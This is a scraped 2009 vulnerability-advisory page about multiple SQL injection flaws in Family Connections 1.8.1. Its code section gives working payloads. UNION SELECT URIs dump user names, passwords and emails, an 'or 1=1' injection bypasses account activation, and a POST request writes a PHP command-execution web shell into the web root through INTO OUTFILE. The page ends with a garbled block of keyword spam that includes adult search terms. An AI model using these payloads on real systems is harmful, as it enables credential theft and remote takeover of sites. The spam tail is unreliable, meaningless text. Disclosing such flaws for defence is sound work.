exploits , vulnerabilities , articles , Family Connections Multiple SQL Injection Vulnerabilities

Title	Family Connections Multiple SQL Injection Vulnerabilities
Published	2009-03-30-12:00AM
Updated	2009-04-01-05:36PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Salvatore "drosophila" Fresta
Vulnerable	Haudenschilt Family Connections 1.8.1
Not Vulnerable	Haudenschilt Family Connections 1.8.2
Code	Attackers can use a browser to exploit these issues.The following example URIs, data, and exploit are available:http://www.example.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.example.com/path/recipes.php?category=1&id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.example.com/path/activate.php?uid=1 or 1=1&code= POST /path/lostpw.php HTTP/1.1\r" Host: www.site.com\r" Content-Type: application/x-www-form-urlencoded\r" Content-Length: 193\r\r" email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# /data/vulnerabilities/exploits/34297.html
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:45:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
XEX photo sexi www.89-com bind 9.2.3 FOTO SARAH UM-A sec&am sex maroc. Adultmovi potosex Distribute CVE-2004-0 www.szwdms Invision P Openssh 3 votw www.36688. Free xxxmo iipokyqige WWW.XNXXCO www.xglhc4 pig tits Inclusion apache bsd gta vice c guti www.free x ptpp Tamil song Wx.Sexape. www.80845. Www.Yahoo. thrishabat ms-06 wwwsex.de Port 1368 sx. indian bab _...cs/vie 2.4.x root Expedia Enema schoolsexp priyamanis Entity Enc Swathiwwzw www.ljcaix com_artlin xp+activat www.angela